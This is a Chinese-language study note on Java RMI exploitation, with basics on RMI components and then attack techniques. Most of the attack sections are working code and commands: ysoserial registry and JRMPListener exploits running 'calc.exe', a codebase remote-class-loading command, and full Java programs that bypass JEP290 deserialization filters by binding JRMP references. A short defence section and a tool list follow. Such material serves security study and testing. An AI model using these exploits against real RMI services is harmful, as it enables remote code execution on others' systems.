RMI利用学习文档<\/h1>

一、RMI基础概念<\/h2>

1.1 RMI简介<\/h3>

RMI(Remote Method Invocation)是Java的远程方法调用机制，允许一个Java虚拟机上的对象调用另一个Java虚拟机上对象的方法。特点：<\/p>

对象使用序列化传输<\/li>
方法执行在远程服务上完成<\/li>

底层基于TCP协议通信<\/li> <\/ul>

1.2 RMI核心组件<\/h3>

远程接口(Remote Interface)<\/strong>：定义可远程调用的方法<\/li>
远程对象实现(Remote Object Implementation)<\/strong>：实现远程接口<\/li>
RMI注册表(RMI Registry)<\/strong>：管理远程对象名称绑定<\/li>

客户端(Client)<\/strong>：查找并调用远程对象<\/li> <\/ol>
1.3 基本代码结构<\/h3>
远程接口示例<\/h4>
package<\/span> org.zzlearn_test.RMI;<\/span> <\/span><\/span>import<\/span> java.rmi.Remote;<\/span> <\/span><\/span>import<\/span> java.rmi.RemoteException;<\/span> <\/span><\/span> <\/span><\/span>public<\/span> interface<\/span> ServiceInterface<\/span> extends<\/span> Remote {<\/span> <\/span><\/span> String hello<\/span>(<\/span>String a)<\/span> throws<\/span> RemoteException;<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>远程对象实现<\/h4> package<\/span> org.zzlearn_test.RMI;<\/span> <\/span><\/span>import<\/span> java.rmi.RemoteException;<\/span> <\/span><\/span>import<\/span> java.rmi.server.UnicastRemoteObject;<\/span> <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> Service<\/span> extends<\/span> UnicastRemoteObject implements<\/span> ServiceInterface {<\/span> <\/span><\/span> protected<\/span> Service<\/span>()<\/span> throws<\/span> RemoteException {<\/span> <\/span><\/span> super<\/span>();<\/span> <\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> public<\/span> String hello<\/span>(<\/span>String a)<\/span> throws<\/span> RemoteException {<\/span> <\/span><\/span> System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"call from "<\/span>+<\/span>a);<\/span> <\/span><\/span> return<\/span> "Hello "<\/span> +<\/span> a;<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>RMI服务端<\/h4> package<\/span> org.zzlearn_test.RMI;<\/span> <\/span><\/span>import<\/span> java.rmi.Naming;<\/span> <\/span><\/span>import<\/span> java.rmi.registry.LocateRegistry;<\/span> <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> RMIServer<\/span> {<\/span> <\/span><\/span> private<\/span> void<\/span> start<\/span>()<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> Service h =<\/span> new<\/span> Service();<\/span> <\/span><\/span> LocateRegistry.<\/span>createRegistry<\/span>(<\/span>1091<\/span>);<\/span> <\/span><\/span> Naming.<\/span>bind<\/span>(<\/span>"rmi:\/\/127.0.0.1:1091\/Hello"<\/span>,<\/span> h);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> new<\/span> RMIServer().<\/span>start<\/span>();<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>RMI客户端<\/h4> package<\/span> org.zzlearn_test.RMI;<\/span> <\/span><\/span>import<\/span> java.rmi.Naming;<\/span> <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> RMIClient<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> ServiceInterface hello =<\/span> (<\/span>ServiceInterface)<\/span> Naming.<\/span>lookup<\/span>(<\/span>"rmi:\/\/127.0.0.1:1091\/Hello"<\/span>);<\/span> <\/span><\/span> String ret =<\/span> hello.<\/span>hello<\/span>(<\/span>"test2"<\/span>);<\/span> <\/span><\/span> System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>ret);<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>二、RMI通信机制<\/h2> 2.1 通信流程<\/h3> 客户端首先连接RMI Registry<\/li> Registry回复一个Data消息，包含新的端口信息<\/li> 客户端根据Data中的信息(ip,端口)连接真正的RMI服务<\/li> 客户端传输参数，服务端执行并返回结果<\/li> <\/ol> 2.2 注册中心创建方式<\/h3> 两种获取注册中心的方式：<\/p> LocateRegistry.createRegistry<\/code><\/li> LocateRegistry.getRegistry<\/code><\/li> <\/ol> createRegistry实现<\/h4> public<\/span> static<\/span> Registry createRegistry<\/span>(<\/span>int<\/span> port)<\/span> throws<\/span> RemoteException {<\/span> <\/span><\/span> return<\/span> new<\/span> RegistryImpl(<\/span>port);<\/span> <\/span><\/span>}<\/span> <\/span><\/span> <\/span><\/span>public<\/span> static<\/span> Registry createRegistry<\/span>(<\/span>int<\/span> port,<\/span> RMIClientSocketFactory csf,<\/span> RMIServerSocketFactory ssf)<\/span> throws<\/span> RemoteException {<\/span> <\/span><\/span> return<\/span> new<\/span> RegistryImpl(<\/span>port,<\/span> csf,<\/span> ssf);<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>getRegistry实现<\/h4> public<\/span> static<\/span> Registry getRegistry<\/span>(<\/span>String host,<\/span> int<\/span> port,<\/span> RMIClientSocketFactory csf)<\/span> throws<\/span> RemoteException {<\/span> <\/span><\/span> LiveRef liveRef =<\/span> new<\/span> LiveRef(<\/span>new<\/span> ObjID(<\/span>ObjID.<\/span>REGISTRY_ID<\/span>),<\/span> new<\/span> TCPEndpoint(<\/span>host,<\/span> port,<\/span> csf,<\/span> null<\/span>),<\/span> false<\/span>);<\/span> <\/span><\/span> RemoteRef ref =<\/span> (<\/span>csf ==<\/span> null<\/span>)<\/span> ?<\/span> new<\/span> UnicastRef(<\/span>liveRef)<\/span> :<\/span> new<\/span> UnicastRef2(<\/span>liveRef);<\/span> <\/span><\/span> return<\/span> (<\/span>Registry)<\/span> Util.<\/span>createProxy<\/span>(<\/span>RegistryImpl.<\/span>class<\/span>,<\/span> ref,<\/span> false<\/span>);<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>2.3 绑定过程分析<\/h3> createRegistry<\/code>返回的是RegistryImpl<\/code>对象，直接操作本地绑定<\/li> getRegistry<\/code>返回的是RegistryImpl_Stub<\/code>对象，通过远程调用绑定<\/li> <\/ul> 直接绑定流程<\/h4> public<\/span> void<\/span> bind<\/span>(<\/span>String var1,<\/span> Remote var2)<\/span> throws<\/span> RemoteException,<\/span> AlreadyBoundException,<\/span> AccessException {<\/span> <\/span><\/span> checkAccess(<\/span>"Registry.bind"<\/span>);<\/span> <\/span><\/span> synchronized<\/span>(<\/span>this<\/span>.<\/span>bindings<\/span>)<\/span> {<\/span> <\/span><\/span> Remote var4 =<\/span> (<\/span>Remote)<\/span>this<\/span>.<\/span>bindings<\/span>.<\/span>get<\/span>(<\/span>var1);<\/span> <\/span><\/span> if<\/span> (<\/span>var4 !=<\/span> null<\/span>)<\/span> {<\/span> <\/span><\/span> throw<\/span> new<\/span> AlreadyBoundException(<\/span>var1);<\/span> <\/span><\/span> }<\/span> else<\/span> {<\/span> <\/span><\/span> this<\/span>.<\/span>bindings<\/span>.<\/span>put<\/span>(<\/span>var1,<\/span> var2);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>远程绑定流程<\/h4> public<\/span> void<\/span> bind<\/span>(<\/span>String var1,<\/span> Remote var2)<\/span> throws<\/span> AccessException,<\/span> AlreadyBoundException,<\/span> RemoteException {<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> RemoteCall var3 =<\/span> super<\/span>.<\/span>ref<\/span>.<\/span>newCall<\/span>(<\/span>this<\/span>,<\/span> operations,<\/span> 0<\/span>,<\/span> 4905912898345647071L<\/span>);<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> ObjectOutput var4 =<\/span> var3.<\/span>getOutputStream<\/span>();<\/span> <\/span><\/span> var4.<\/span>writeObject<\/span>(<\/span>var1);<\/span> <\/span><\/span> var4.<\/span>writeObject<\/span>(<\/span>var2);<\/span> <\/span><\/span> }<\/span> catch<\/span> (<\/span>IOException var5)<\/span> {<\/span> <\/span><\/span> throw<\/span> new<\/span> MarshalException(<\/span>"error marshalling arguments"<\/span>,<\/span> var5);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> super<\/span>.<\/span>ref<\/span>.<\/span>invoke<\/span>(<\/span>var3);<\/span> <\/span><\/span> super<\/span>.<\/span>ref<\/span>.<\/span>done<\/span>(<\/span>var3);<\/span> <\/span><\/span> }<\/span> catch<\/span> (<\/span>RuntimeException var6)<\/span> {<\/span> <\/span><\/span> throw<\/span> var6;<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>三、RMI攻击面分析<\/h2> 3.1 攻击场景分类<\/h3> 攻击服务端<\/li> 攻击客户端<\/li> 攻击注册中心<\/li> 利用DGC(分布式垃圾收集)攻击<\/li> <\/ol> 3.2 攻击方法<\/h3> 3.2.1 直接反序列化攻击<\/h4> 当服务端接受Object类型参数时，可构造恶意序列化对象：<\/p> public<\/span> class<\/span> RMIClient<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> Object seri =<\/span> CommonsCollections6TemplatesImpl();<\/span> <\/span><\/span> ServiceInterface hello =<\/span> (<\/span>ServiceInterface)<\/span> Naming.<\/span>lookup<\/span>(<\/span>"rmi:\/\/127.0.0.1:1091\/Hello"<\/span>);<\/span> <\/span><\/span> String ret =<\/span> hello.<\/span>hello<\/span>(<\/span>seri);<\/span> <\/span><\/span> System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>ret);<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>3.2.2 利用codebase执行任意代码<\/h4> 条件：<\/p> java.rmi.server.useCodebaseOnly=false<\/code>或Java版本<7u21\/6u45<\/li> 设置了System.setSecurityManager(new RMISecurityManager());<\/code><\/li> <\/ol> 攻击方式：<\/p> java -Djava.rmi.server.useCodebaseOnly=<\/span>false -Djava.rmi.server.codebase=<\/span>http:\/\/example.com\/ RMIClient <\/span><\/span><\/code><\/pre>3.2.3 攻击注册中心<\/h4> 使用ysoserial工具：<\/p> java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit 127.0.0.1 1091<\/span> CommonsCollections1 "calc.exe"<\/span> <\/span><\/span><\/code><\/pre>3.2.4 利用DGC攻击<\/h4> 使用JRMPListener：<\/p> java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099<\/span> CommonsCollections6 "calc.exe"<\/span> <\/span><\/span><\/code><\/pre>客户端触发：<\/p> import<\/span> java.rmi.registry.LocateRegistry;<\/span> <\/span><\/span>import<\/span> java.rmi.registry.Registry;<\/span> <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> RegistryToClient<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> Registry registry =<\/span> LocateRegistry.<\/span>getRegistry<\/span>(<\/span>"127.0.0.1"<\/span>,<\/span>1099<\/span>);<\/span> <\/span><\/span> registry.<\/span>unbind<\/span>(<\/span>"http:\/\/127.0.0.1\/Hello"<\/span>);<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>3.3 绕过限制技术<\/h3> 3.3.1 绕过参数类型限制<\/h4> 当方法参数类型为String等非Object时，需要：<\/p> 修改方法hash或参数类型<\/li> 使用网络代理修改序列化对象<\/li> 使用工具如：https:\/\/github.com\/Afant1\/RemoteObjectInvocationHandler<\/li> <\/ol> 3.3.2 绕过JEP290限制<\/h4> 方法一：利用DGC开启JRMP(8u121-8u230)<\/strong><\/p> import<\/span> sun.rmi.server.UnicastRef;<\/span> <\/span><\/span>import<\/span> sun.rmi.transport.LiveRef;<\/span> <\/span><\/span>import<\/span> sun.rmi.transport.tcp.TCPEndpoint;<\/span> <\/span><\/span>import<\/span> java.lang.reflect.Proxy;<\/span> <\/span><\/span>import<\/span> java.rmi.registry.LocateRegistry;<\/span> <\/span><\/span>import<\/span> java.rmi.registry.Registry;<\/span> <\/span><\/span>import<\/span> java.rmi.server.ObjID;<\/span> <\/span><\/span>import<\/span> java.rmi.server.RemoteObjectInvocationHandler;<\/span> <\/span><\/span>import<\/span> java.util.Random;<\/span> <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> JRMPToRegistry<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> Registry reg =<\/span> LocateRegistry.<\/span>getRegistry<\/span>(<\/span>"127.0.0.1"<\/span>,<\/span>1091<\/span>);<\/span> <\/span><\/span> ObjID id =<\/span> new<\/span> ObjID(<\/span>new<\/span> Random().<\/span>nextInt<\/span>());<\/span> <\/span><\/span> TCPEndpoint te =<\/span> new<\/span> TCPEndpoint(<\/span>"127.0.0.1"<\/span>,<\/span> 1234<\/span>);<\/span> <\/span><\/span> UnicastRef ref =<\/span> new<\/span> UnicastRef(<\/span>new<\/span> LiveRef(<\/span>id,<\/span> te,<\/span> false<\/span>));<\/span> <\/span><\/span> RemoteObjectInvocationHandler obj =<\/span> new<\/span> RemoteObjectInvocationHandler(<\/span>ref);<\/span> <\/span><\/span> Registry proxy =<\/span> (<\/span>Registry)<\/span> Proxy.<\/span>newProxyInstance<\/span>(<\/span>Registry.<\/span>class<\/span>.<\/span>getClassLoader<\/span>(),<\/span> <\/span><\/span> new<\/span> Class[]<\/span> {<\/span> Registry.<\/span>class<\/span> },<\/span> obj);<\/span> <\/span><\/span> reg.<\/span>bind<\/span>(<\/span>"test12"<\/span>,<\/span>proxy);<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>方法二：利用UnicastRemoteObject(8u231-8u240)<\/strong><\/p> import<\/span> sun.rmi.registry.RegistryImpl_Stub;<\/span> <\/span><\/span>import<\/span> sun.rmi.server.UnicastRef;<\/span> <\/span><\/span>import<\/span> sun.rmi.transport.LiveRef;<\/span> <\/span><\/span>import<\/span> sun.rmi.transport.tcp.TCPEndpoint;<\/span> <\/span><\/span>import<\/span> java.io.ObjectOutput;<\/span> <\/span><\/span>import<\/span> java.lang.reflect.*;<\/span> <\/span><\/span>import<\/span> java.rmi.registry.*;<\/span> <\/span><\/span>import<\/span> java.rmi.server.*;<\/span> <\/span><\/span>import<\/span> java.util.Random;<\/span> <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> Client2<\/span> {<\/span> <\/span><\/span> public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> UnicastRemoteObject payload =<\/span> getPayload();<\/span> <\/span><\/span> Registry registry =<\/span> LocateRegistry.<\/span>getRegistry<\/span>(<\/span>1091<\/span>);<\/span> <\/span><\/span> bindReflection(<\/span>"pwn"<\/span>,<\/span> payload,<\/span> registry);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> static<\/span> UnicastRemoteObject getPayload<\/span>()<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> ObjID id =<\/span> new<\/span> ObjID(<\/span>new<\/span> Random().<\/span>nextInt<\/span>());<\/span> <\/span><\/span> TCPEndpoint te =<\/span> new<\/span> TCPEndpoint(<\/span>"127.0.0.1"<\/span>,<\/span> 1234<\/span>);<\/span> <\/span><\/span> UnicastRef ref =<\/span> new<\/span> UnicastRef(<\/span>new<\/span> LiveRef(<\/span>id,<\/span> te,<\/span> false<\/span>));<\/span> <\/span><\/span> RemoteObjectInvocationHandler handler =<\/span> new<\/span> RemoteObjectInvocationHandler(<\/span>ref);<\/span> <\/span><\/span> RMIServerSocketFactory factory =<\/span> (<\/span>RMIServerSocketFactory)<\/span> Proxy.<\/span>newProxyInstance<\/span>(<\/span> <\/span><\/span> handler.<\/span>getClass<\/span>().<\/span>getClassLoader<\/span>(),<\/span> <\/span><\/span> new<\/span> Class[]{<\/span>RMIServerSocketFactory.<\/span>class<\/span>,<\/span> Remote.<\/span>class<\/span>},<\/span> <\/span><\/span> handler <\/span><\/span> );<\/span> <\/span><\/span> Constructor<<\/span>UnicastRemoteObject><\/span> constructor =<\/span> UnicastRemoteObject.<\/span>class<\/span>.<\/span>getDeclaredConstructor<\/span>();<\/span> <\/span><\/span> constructor.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> UnicastRemoteObject unicastRemoteObject =<\/span> constructor.<\/span>newInstance<\/span>();<\/span> <\/span><\/span> Field field_ssf =<\/span> UnicastRemoteObject.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"ssf"<\/span>);<\/span> <\/span><\/span> field_ssf.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> field_ssf.<\/span>set<\/span>(<\/span>unicastRemoteObject,<\/span> factory);<\/span> <\/span><\/span> return<\/span> unicastRemoteObject;<\/span> <\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> static<\/span> void<\/span> bindReflection<\/span>(<\/span>String name,<\/span> Object obj,<\/span> Registry registry)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> Field ref_filed =<\/span> RemoteObject.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"ref"<\/span>);<\/span> <\/span><\/span> ref_filed.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> UnicastRef ref =<\/span> (<\/span>UnicastRef)<\/span> ref_filed.<\/span>get<\/span>(<\/span>registry);<\/span> <\/span><\/span> Field operations_filed =<\/span> RegistryImpl_Stub.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"operations"<\/span>);<\/span> <\/span><\/span> operations_filed.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> Operation[]<\/span> operations =<\/span> (<\/span>Operation[])<\/span> operations_filed.<\/span>get<\/span>(<\/span>registry);<\/span> <\/span><\/span> RemoteCall remoteCall =<\/span> ref.<\/span>newCall<\/span>((<\/span>RemoteObject)<\/span> registry,<\/span> operations,<\/span> 0<\/span>,<\/span> 4905912898345647071L<\/span>);<\/span> <\/span><\/span> ObjectOutput outputStream =<\/span> remoteCall.<\/span>getOutputStream<\/span>();<\/span> <\/span><\/span> Field enableReplace_filed =<\/span> ObjectOutputStream.<\/span>class<\/span>.<\/span>getDeclaredField<\/span>(<\/span>"enableReplace"<\/span>);<\/span> <\/span><\/span> enableReplace_filed.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> enableReplace_filed.<\/span>setBoolean<\/span>(<\/span>outputStream,<\/span> false<\/span>);<\/span> <\/span><\/span> outputStream.<\/span>writeObject<\/span>(<\/span>name);<\/span> <\/span><\/span> outputStream.<\/span>writeObject<\/span>(<\/span>obj);<\/span> <\/span><\/span> ref.<\/span>invoke<\/span>(<\/span>remoteCall);<\/span> <\/span><\/span> ref.<\/span>done<\/span>(<\/span>remoteCall);<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>四、防御措施<\/h2> 4.1 JDK安全更新<\/h3> 8u121<\/strong>：增加checkAccess<\/code>方法检查是否为localhost<\/li> 8u141<\/strong>：在RegistryImpl_Skel<\/code>中提前执行checkAccess<\/code><\/li> JEP290<\/strong>：引入反序列化过滤机制<\/li> <\/ol> 4.2 JEP290机制<\/h3> 实现ObjectInputFilter<\/code>接口<\/li> 提供可配置的过滤机制(白名单\/黑名单)<\/li> 白名单包含：String、Number、Remote、Proxy、UnicastRef等<\/li> <\/ul> 4.3 最佳实践<\/h3> 升级到最新JDK版本<\/li> 设置java.rmi.server.useCodebaseOnly=true<\/code><\/li> 限制RMI服务网络访问<\/li> 使用安全管理器并配置严格策略<\/li> <\/ol> 五、工具推荐<\/h2> BaRMIe<\/strong>：RMI危险方法探测工具 https:\/\/github.com\/NickstaDB\/BaRMIe<\/li> ysoserial<\/strong>：反序列化利用工具 https:\/\/github.com\/frohoff\/ysoserial<\/li> RemoteObjectInvocationHandler<\/strong>：绕过参数限制工具 https:\/\/github.com\/Afant1\/RemoteObjectInvocationHandler<\/li> ysomap<\/strong>：高级RMI利用框架 https:\/\/github.com\/wh1t3p1g\/ysomap<\/li> <\/ol>